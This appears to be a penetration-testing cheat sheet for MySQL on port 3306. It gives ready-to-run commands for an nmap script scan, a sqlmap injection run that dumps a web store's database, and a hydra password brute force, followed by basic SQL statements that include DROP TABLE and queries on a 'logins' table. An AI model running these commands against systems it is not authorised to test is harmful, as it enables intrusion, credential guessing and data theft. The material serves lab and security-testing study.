MySQL-3306
scan
# initial scan
nmap -T4 -vv -sC --script=mysql-* $IP -p 3306 -oN recon/nmap_sql_port
# website scan
sqlmap -u '$IP/store.php?id=1' --dbms=MySQL --form --risk 3 --level 5 --threads 10 --random-agent --batch --dump
login
mysql -u'username' -p'password' -h $IP -D opencats
# opencats --> database name
# brute force using hydra
hydra -l $username -P /path/to/wordlist $IP mysql
Basic commands to enumerate database content
SHOW columns FROM nume_tabel; # see columns name
SELECT * FROM table_name; #Show all columns in a table
SELECT column1, column2 FROM table_name; #Show specific columns in a table
DROP TABLE logins; #Delete a table
ALTER TABLE logins ADD newColumn INT; #Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn; #Rename column
ALTER TABLE logins MODIFY oldColumn DATE; #Change column datatype
ALTER TABLE logins DROP oldColumn; #Delete column
SELECT * FROM logins ORDER BY column_1; #Sort by column
SELECT * FROM logins ORDER BY column_1 DESC; #Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC; #Sort by two-columns
SELECT * FROM logins LIMIT 2; #Only show first two results
SELECT * FROM logins LIMIT 1, 2; #Only show first two results starting from index 2
SELECT * FROM table_name WHERE <condition>; #List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%'; #List results where the name is similar Last updated